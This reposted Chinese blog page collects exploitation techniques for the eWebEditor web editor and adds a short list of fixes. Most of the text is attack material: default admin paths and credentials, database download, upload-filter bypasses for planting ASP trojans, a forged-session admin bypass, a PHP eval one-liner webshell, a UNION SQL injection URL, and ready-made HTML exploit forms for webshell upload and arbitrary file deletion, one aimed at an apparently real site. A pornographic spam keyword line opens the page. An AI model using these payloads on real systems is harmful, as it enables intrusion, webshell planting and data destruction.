乡下人产国偷v产偷v自拍,国产午夜片在线观看,婷婷成人亚洲综合国产麻豆,久久综合给合久久狠狠狠9

  • <output id="e9wm2"></output>
    <s id="e9wm2"><nobr id="e9wm2"><ins id="e9wm2"></ins></nobr></s>

    • 分享

      ewebedit漏洞總結(jié)及解決方法

       林中雁 2011-10-30

      ewebedit漏洞總結(jié)及解決方法  

      2010-04-12 15:26:27|  分類: 網(wǎng)站建設(shè) |  標簽: |字號 訂閱

      /admin_login.asp        admin/admin  admin888
      /db/ewebeditor.mdb
      ewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=..再加 &dir=../..&dir=../../../.. 看到整個網(wǎng)站文件了

      eWebEditor/admin_login.asp        
      eWebEditor/db/ewebeditor.mdb
      eWebEditor/ewebeditor.asp
      eWebEditor/uploadfile/


      這個編輯器按腳本分主要有4個版本,ASP/ASPX/PHP/JSP 每個版本都有可以利用的漏洞。

      判斷網(wǎng)站是否使用了eWebEditor
      查看程序源代碼,看看源碼中是否存在類似“ewebeditor.asp?id=”語句,只要有此語句的存在,就能判斷網(wǎng)站確實使用了WEB編輯器。另外一種方法就是站上新聞或者其他板塊上找圖片、附件等的鏈接,是否為admin/eWebEditor/UploadFile/xxxx.jpg之類格式。
      安全漏洞
      管理員未對編輯器的數(shù)據(jù)庫路徑和名稱進行修改,導(dǎo)致可以利用編輯器默認路徑直接對網(wǎng)站數(shù)據(jù)庫進行下載。
      管理員未對編輯器的用戶登錄路徑進行修改,導(dǎo)致黑客可以利用網(wǎng)站數(shù)據(jù)庫所獲得的用戶名和密碼直接登陸編輯器管理后臺。
      該WEB編輯器上傳程序存在的安全漏洞。

      一、ASP版
      1.關(guān)鍵文件的名稱和路徑
      這個版本其實個人感覺是影響最大,使用最多的一個了吧,早期很多asp站都用這個,當然現(xiàn)在也是大量的存在的……
      幾個關(guān)鍵文件的名稱和路徑:
      Admin_Login.asp 登錄頁面
      Admin_Default.asp 管理首頁
      Admin_Style.asp
      Admin_UploadFile.asp
      Upload.asp
      Admin_ModiPwd.asp
      eWebEditor.asp
      db/ewebeditor.mdb 默認數(shù)據(jù)庫路徑

      2.默認用戶名密碼
      一般用這個的默認后臺的URL都是默認的:
      www./admin/ewebeditor/login_admin.asp
      類似:
      www./ewebeditor/login_admin.asp
      www./admin/eweb/login_admin.asp
      www./admin/editor/login_admin.asp
      而且賬戶和密碼也基本都是默認的:admin admin(admin888)

      3.下載數(shù)據(jù)庫
      還有如果默認的賬戶和密碼修改了,我們可以下載他的數(shù)據(jù)庫,然后本地破解MD5了.
      默認數(shù)據(jù)庫:…/db/ewebeditor.mdb 或者 …/db/ewebeditor.asp,一般下載數(shù)據(jù)庫后打開察看就可以了。

      4.文件上傳
      登錄后臺后,點擊“樣式管理”,隨便選擇列表中底下的某一個樣式。注意:eWebEditor自帶的樣式是不允許修的,當然你也可以拷貝一個新的樣式來設(shè)置。在上傳的“其它類型”中增加“asa”類型:接下來把免殺的ASP木馬的后綴名改成asa,返回管理首頁,點擊“預(yù)覽”,然后選擇“插入其它文件”的按鈕進行ASP木馬的上傳:上傳的ASP木馬就在“UploadFile”文件夾里。
      如果加了asa類型后發(fā)現(xiàn)還是無法上傳。應(yīng)該是站長懂點代碼,自己修改了Upload.asp文件,但是沒有關(guān)系,按照常人的思維習(xí)慣,往往會直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看見過一個站長是這樣修改的:sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)猛一看什么都過濾了,但是我們只要在上傳類型中增加“aaspsp”,就可以直接上傳asp文件了。
      如果上述兩種方法都失敗了,則利用eWebEditor能夠設(shè)定自動保存遠程文件的類型,我們可以加入asp類型。但是如何才能讓遠程訪問的asp文件能夠以源碼形式保存呢?方法是很多的,最簡單的方法是將IIS中的“應(yīng)用文件映射”中的“asp”刪除。(此方法未經(jīng)測試,個人感覺利用率不高)
      有的站數(shù)據(jù)庫設(shè)置了只讀屬性,這樣的站你是無法新加樣式的,這樣的站你可以看他數(shù)據(jù)庫里的樣式設(shè)置情況,一般很多時候都是讓人給拿過的,而且明顯的asa在那里。這樣的話就可以直接構(gòu)造一個調(diào)用這個樣式的連接來上傳shell。比如發(fā)現(xiàn)數(shù)據(jù)庫里有樣式 123 他設(shè)置的是可以上傳asa的話那么就可以這樣調(diào)用:http://www./eWeb/eWebEditor.asp?id=contentCN&style=123這樣就可以直接上傳了,然后在點“編輯”就會找到shell的路徑了。其實這個漏洞主要是upload.asp的過濾不嚴造成的,新版的應(yīng)該都修復(fù)了,具體受影響的版本我也沒統(tǒng)計過。

      5.遍歷路徑
      ewebeditor遍歷路徑漏洞(當數(shù)據(jù)庫只讀的時候)ewebeditor/admin_uploadfile.asp?id=14在id=14后面添加&dir=再加 &dir=/或&dir=http://www.xx// 看到整個網(wǎng)站文件了, 不過此項在測試的時候發(fā)現(xiàn),只有登錄成功才能進行這項操作。

      6.Cookie漏洞
      漏洞文件:Admin_Private.asp.
      漏洞語句:
      《% If Session(“eWebEditor_User”) = “” Then
      Response.Redirect “admin_login.asp”
      Response.End
      End If
      只判斷了session,沒有判斷cookies和路徑的驗證問題。
      漏洞利用:
      新建一個mrchen.asp內(nèi)容如下:
      《%Session("eWebEditor_User") = "11111111"%》
      訪問mrchen.asp,再訪問后臺任何文件,for example:Admin_Default.asp這個拿shell的方法就簡單了。

      二、ASPX版
      Javascript文件上傳
      受影響文件:eWebEditorNet/upload.aspx
      原理:代碼

      ”uploadfile“ style=”file“ size=”uploadfile“ runat=
      ”lbtnUpload“ runat=
      ”JavaScript“》
      只是簡單的對ID進行驗證,只要構(gòu)造javascript:lbtnUpload.click();滿足條件達到上傳木馬的效果。
      利用方法:添好本地的cer的Shell文件。在瀏攬器輸入javascript:lbtnUpload.click();就能得到shell,繞過了限制,成功上傳ASPX文件, 。成功以后查看源代碼代碼
      a ”lbtnUpload“ ”javascript:__doPostBack(‘lbtnUpload’,“)”script 'javascript'
      文件默認的上傳后保存的地址是eWebEditorNet/UploadFile/,看看是否上傳成功。

      三、PHP版
      關(guān)于eWebEditor 漏洞php版本的和asp的一樣。有目錄瀏覽。和編輯擴展名。重點在于雖然支持了php格式但上傳還是上傳不了。不過利用織夢的gif89a漏洞倒可以實現(xiàn)php一句話上傳,然后再上傳webshell。
      備注:織夢的gif89a漏洞,準確來說應(yīng)該是DEDECMS中所用的php版的FCKeditor存在上傳漏洞,gif89a文件頭欺騙。DEDECMS中在上傳拖上沒有對picSubmit進行任何處理。但是卻不能直接上傳php馬。因為會識別。使用修改過的php小馬。
      gif89a
      phpinfo();

      RFI
      gif89a
      eval($_POST[c]);

      利用gif89a進行了欺騙。現(xiàn)在上傳就可以成功了。然后有php一句話客戶端連接。

      四、JSP版
      上傳漏洞
      影響版本:漏洞存在于ewebeditor jsp版 1.4以下版本,漏洞有兩個版本。
      原理:第一個是使用savefile.jsp來進行文件上傳操作的,從代碼中可以看出,程序并沒做任何上傳過濾,這樣我們就可以直接上傳一個JSPShell了。另一個版本可能是被人修改過,把代碼轉(zhuǎn)成了servlet,不能看到代碼,但是利用方法卻大同小異。
      利用方法:我們先找一個1.4版本以下的ewebeditor JSP上傳頁面,選擇好一個JSPShell。這個ewebeditor是沒有提交按鈕的,所以這里涉及到一個小技巧,就是在上傳的對話框中敲下回車,大約過半分鐘,就可以查看網(wǎng)頁的源文件來尋找我們的Webshell了。
      解決方法
      1.修改admin密碼;
      2.upload.asp中的:
      “任何情況下都不允許上傳asp腳本文件sAllowExt = Replace(UCase(sAllowExt), ”ASP“, ”“)
      改為:
      ”任何情況下都不允許上傳asp腳本文件
      sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
      sAllowExt = Replace(UCase(sAllowExt), “ASA”, “”)
      sAllowExt = Replace(UCase(sAllowExt), “CER”, “”)
      sAllowExt = Replace(UCase(sAllowExt), “AASPSP”, “”)
      sAllowExt = Replace(UCase(sAllowExt), “CDX”, “”)
      sAllowExt = Replace(UCase(sAllowExt), “HTR”, “”)
      3. Admin_Private.asp:
      If Session(“eWebEditor_User”) = “” Then
      Response. Redirect “admin_login.asp”
      Response. End
      End If
      改為:
      If Session(“eWebEditor_User”) = “” and IsSelfRefer() Then
      Response.Redirect “admin_login.asp”
      Response.End
      End If
      4.將db/ewebeditor.mdb數(shù)據(jù)庫文件名改為其他包含#等字符的文件名;
      5. 將IIS中的“應(yīng)用文件映射”中的“asp”刪除;
      6. 仍有問題刪除admin_login.asp文件。
      2009年3月補充:
      這個漏洞可以很雞肋,也可以很致命,關(guān)鍵看你怎么利用!此漏洞存在于Example\NewsSystem目錄下的delete.asp文件中,這是ewebeditor的測試頁面,無須登陸可以直接進入,看這些代碼:
      ' 把帶“xx”的字符串轉(zhuǎn)為數(shù)組
      Dim aSavePathFileName
      aSavePathFileName = Split(sSavePathFileName, “xx”)
      ' 刪除新聞相關(guān)的文件,從文件夾中
      Dim i
      For i = 0 To UBound(aSavePathFileName)
      ' 按路徑文件名刪除文件
      Call DoDelFile(aSavePathFileName(i))
      Next
      而aSavePathFileName是前面從數(shù)據(jù)庫取出來的:
      sSavePathFileName = oRs(“D_SavePathFileName”)
      看看D_SavePathFileName是怎么添加到數(shù)據(jù)庫里的,在addsave.asp(modifysave.asp)里:
      sSavePathFileName = GetSafeStr(Request.Form(“d_savepathfilename”))

      oRs(“D_SavePathFileName”) = sSavePathFileName
      居然過濾了,是GetSafeStr函數(shù),再看看這個函數(shù),在Startup.asp里:
      Function GetSafeStr(str)
      GetSafeStr = Replace(Replace(Replace(Trim(str), “‘”, “”), Chr(34), “”), “;”, “”)
      End Function
      無語,這不是過濾字符型注入的函數(shù)么?放這里什么用也沒有??!既然路徑?jīng)]有過濾,那就可以直接定義了,構(gòu)造一個提交頁面,其中 d_savepathfilename自己任意賦值(要刪除多個文件,用xx隔開即可)。試試//eWebEditor.asp,提交后刪除該新 聞,于是主目錄下的eWebEditor.asp不見了!下面給出利用的htm:

      《HTML》《HEAD》《TITLE》eWebEditor刪除文件 by:oldjun(http://www.)《/TITLE》
      《style》body,p,td,input {font-size:9pt}《/style》
      《/HEAD》《BODY》《a href='list.asp'》新聞列表《/a》 xx 《a href='add.asp'》增加新聞《/a》
      《b》增加新聞《/b》
      《form action=“http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”
      method=“post” name=“myform”》
      《input type=hidden name=d_originalfilename》
      《input type=hidden name=d_savefilename》
      《table cellspacing=3 align=center》
      《tr》《td》要刪的文件(相對路徑就可以了):《/td》
      《td》《input type=“text” name=“d_savepathfilename” value=“” size=“90″》《/td》
      《/tr》
      《tr》《td》新聞標題(隨便填):《/td》
      《td》《input type=”text“ name=”d_title“ value=”“ size=”90″》《/td》
      《/tr》
      《tr》《td》標題圖片:《/td》
      《td》《select name=“d_picture” size=1》《option value=“》無《/option》《/select》
      當編輯區(qū)有插入圖片時,將自動填充此下拉框《/td》
      《/tr》
      《tr》《td》新聞內(nèi)容(隨便填):《/td》
      《td》《textarea name=”d_content“》《/textarea》《/td》
      《/tr》
      《/table》
      《input type=submit name=btnSubmit value=” 提 交 “》
      《input type=reset name=btnReset value=” 重 填 “》
      《/form》
      《/BODY》《/HTML》


      刪除文件漏洞一般是配合其他漏洞使用的,比如目錄遍歷!

      ============================================================================================================

      ewebeditor漏洞解決方法2009-06-13 09:45

      1,修改admin的密碼.

      2,upload.asp中的
      ' 任何情況下都不允許上傳asp腳本文件
      sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
      改為:
      ' 任何情況下都不允許上傳asp腳本文件
      sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
      sAllowExt = Replace(UCase(sAllowExt), "ASA", "")
      sAllowExt = Replace(UCase(sAllowExt), "CER", "")
      sAllowExt = Replace(UCase(sAllowExt), "AASPSP", "")
      sAllowExt = Replace(UCase(sAllowExt), "CDX", "")
      sAllowExt = Replace(UCase(sAllowExt), "HTR", "")

      3,Admin_Private.asp
      If Session("eWebEditor_User") = "" Then
      Response.Redirect "admin_login.asp"
      Response.End
      End If
      改為:
      If Session("eWebEditor_User") = "" and IsSelfRefer() Then
      Response.Redirect "admin_login.asp"
      Response.End
      End If
      4,將db/ewebeditor.mdb改為13265341558110#$__.asp
      同時也要將startup.aspoConn.Open "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("db/13265341558110#$__.asp")

      5,將IIS中的"應(yīng)用文件映射"中的"asp"刪除.


      6,還有問題刪除admin_login.asp文件.


      =========================================================
      Ewebeditor 2.1.6 ASP 以下版本上傳漏洞
      UNION運用-直接叼SHELL
      以前曾進過一個網(wǎng)站,把上傳部份的asp代碼下載回來研究,當時感覺有漏洞但沒仔細研究,還以為那是他們自已寫的程序。
      前幾天看到ewebeditor有漏洞的文章才想起那個網(wǎng)站原來用的也是ewebeditor。今天仔細看了看,發(fā)現(xiàn)問題了(2.1.6版本以后不存在),可以指定上傳后的文件擴展名為除asp外的任何,如果該網(wǎng)站沒有刪除cer、asa等文件與asp.dll的映射,就可以上傳木馬了。
      問題出在upload.asp文件中,相關(guān)代碼如下(以2.1.6版為例)
      Sub InitUpload()
      sType = UCase(Trim(Request.QueryString("type")))
      *sStyleName = Trim(Request.QueryString("style"))
      sSql = "select * from ewebeditor_style where s_name='" & sStyleName & "'"
      oRs.Open sSql, oConn, 0, 1
      If Not oRs.Eof Then
      sUploadDir = oRs("S_UploadDir")
      sUploadDir = Replace(sUploadDir, "\", "/")
      If Right(sUploadDir, 1) 《》 "/" Then
      sUploadDir = sUploadDir & "/"
      End If

      Select Case sType
      Case "FILE"
      sAllowExt = oRs("S_FileExt")
      nAllowSize = oRs("S_FileSize")
      Case "MEDIA"
      sAllowExt = oRs("S_MediaExt")
      nAllowSize = oRs("S_MediaSize")
      Case "FLASH"
      sAllowExt = oRs("S_FlashExt")
      nAllowSize = oRs("S_FlashSize")
      Case Else
      sAllowExt = oRs("S_ImageExt")
      nAllowSize = oRs("S_ImageSize")
      End Select
      Else
      OutScript("parent.UploadError('無效的樣式ID號,請通過頁面上的鏈接進行操作!')")
      End If
      oRs.Close
      ' 任何情況下都不允許上傳asp腳本文件
      sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
      End Sub
      上面的sStyleName變量直接從style中讀取,并沒有過濾,所以可以包含任意字符,往下看,用select在ewebeditor_style表中查找s_name為sStyleName的記錄,找不到就提示出錯。
      表面上看有sql注入漏洞,有可能猜出數(shù)據(jù)庫的表、字段,但那些根本沒用,管理員信息不在這個數(shù)據(jù)庫中。
      如果在sStyleName變量中用union來構(gòu)造記錄,情況就不同了,我們可以在sAllowExt中加入"xxcer"、"xxasa",
      構(gòu)造如下
      upload.asp?action=save&type=IMAGE&style=hzh' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]+'xxcer',S_MediaExt,S_RemoteExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_RemoteSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl,S_UploadObject,S_AutoDir,S_BaseHref,S_ContentPath,S_AutoRemote,S_ShowBorder from ewebeditor_style where s_name='standard' and 'a'='a
      編碼后就是
      upload.asp?action=save&type=IMAGE&style=hzh'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'xxcer',S_MediaExt,S_RemoteExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_RemoteSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl,S_UploadObject,S_AutoDir,S_BaseHref,S_ContentPath,S_AutoRemote,S_ShowBorder%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a
      上面的"hzh"可以改為任何字符,但由于只取第一條記錄的數(shù)據(jù),所以必須使union前的select結(jié)果為空,[S_ImageExt]+'xxcer'表示在選擇的S_ImageExt字段中加入"xxcer"串。
      用nc或其它工具發(fā)送就可以上傳木馬了。
      最后提一下union,UNION 操作一般被用來把來自表單、SELECT語句或查詢的數(shù)據(jù)結(jié)合,并省略掉任何重復(fù)的行。所有的數(shù)據(jù)源必須有相同數(shù)目的域,不過這些域不一定要是相同的數(shù)據(jù)類型,即UNION操作不會顯示任何在兩個表單中重復(fù)出現(xiàn)的記錄。利用UNION 的查詢語句一定要與UNION前的查詢語句字段列相等。

      ================================================================
      《H3》ewebeditor asp版 2.1.6 上傳漏洞利用程序----《/H3》《br》《br》
      《form action="http://jpkc.hutc./mz/back/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard'union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'xxcer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a"  method=post name=myform enctype="multipart/form-data"》
      《input type=file name=uploadfile size=100》《br》《br》
      《input type=submit value=Fuck》
      《/form》



      只針對于ASP版本
      修改上傳地址保存為HTM文件,打開可以直接上傳CER文件,測試成功.上傳后地址看源文件.

      《hr》
      action="http://www./news/CmsEditor/upload.asp?action=save&type=IMAGE&style=hdszh'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'xxcer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_RemoteSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl,S_UploadObject,S_AutoDir,S_BaseHref,S_ContentPath,S_AutoRemote,S_ShowBorder%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a"


      action="http://****.com/Upload.asp?action=save&type=IMAGE&style=3shao' union select
      S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%
      2b'xxcer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from
      ewebeditor_style where s_name='standard'and'a'='a"

        本站是提供個人知識管理的網(wǎng)絡(luò)存儲空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊一鍵舉報。
        轉(zhuǎn)藏 分享 獻花(0

        0條評論

        發(fā)表

        請遵守用戶 評論公約

        類似文章 更多